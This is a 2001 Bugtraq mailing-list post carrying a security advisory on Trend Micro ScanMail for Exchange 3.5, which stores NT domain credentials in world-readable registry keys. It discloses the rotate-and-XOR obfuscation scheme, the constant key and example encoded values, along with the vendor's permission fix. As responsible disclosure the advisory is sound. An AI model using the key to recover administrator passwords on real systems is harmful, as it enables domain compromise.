[19962] in bugtraq
STAT Security Advisory: Trend Micro's ScanMail for Exchange store
daemon@ATHENA.MIT.EDU (Maucher, Jon)
Sat Mar 31 19:17:30 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-ID: <BFE302C4DFC0D11195C000805F19DC4D798AF3@corpmx4.ess.harris.com>
Date: Fri, 30 Mar 2001 14:50:33 -0500
Reply-To: "Maucher, Jon" <jmaucher@HARRIS.COM>
From: "Maucher, Jon" <jmaucher@HARRIS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
================================================================================
==
STAT Security Advisory
http://www.statonline.com/
Software Vendor: Trend Micro (www.antivirus.com)
Software Package: ScanMail for Exchange
Versions Affected: 3.5 Evaluation (possibly others)
Synopsis: Account names and passwords stored unprotected
in registry
Issue Date: March 30, 2001
Vendor Response: Vendor notified March 1, 2001
Solution received March 5, 2001
Vendor fix notification received March 29, 2001
================================================================================
==
1. Summary
Trend Micro's ScanMail for Exchange (version 3.5) stores the credentials of
users
in the system registry with no protection. These credentials apply to the NT
domain,
and include a valid NT domain or system username, the NT domain name, and
password.
This occurs in at least two places, once when the product is installed and
once for use by the Management Console. Since both installation and management
require administrative privileges, the administrative account for the system
or for the entire domain can be compromised.
2. Problem Description
Several registry values are created during installation and during use
of the product's Management Console to store the credentials of the
last user to log on. These credentials are valid at least on the server,
and possibly valid on the entire domain depending on the last user to log in.
Additionally, these keys are created with Everyone set to Special Access,
which includes the ability to read the values. The usernames and passwords
are rolled right a number of characters and then XOR'ed with a constant key
(0xB15A0E707EEDEB80F70FB78F1399).
For example, if the Administrators password is "test", then one of the following
values would be stored:
C53F7D04
-or-
3F7D04C5
-or-
7D04C53F
-or-
04C53F7D
The result is a possible administratative compromise of a system (or quite
possibly
an entire domain).
3. Solution
Trend Micro recommends, as a temporary fix, that the following keys (and all
sub-keys)
should have their permissions set to Full Control for Administrators and SYSTEM
(remove all other permissions):
HKLM\Software\TrendMicro\ScanMail for Exchange\RemoteManagement
HKLM\Software\TrendMicro\ScanMail for Exchange\UserInfo
The vendor is implementing a new encryption method that will be
available in version 5.1 of ScanMail for Exchange.
4. Credits
This vulnerability was discovered and researched by Jon Maucher
and Bill Wall of Harris Corporation.
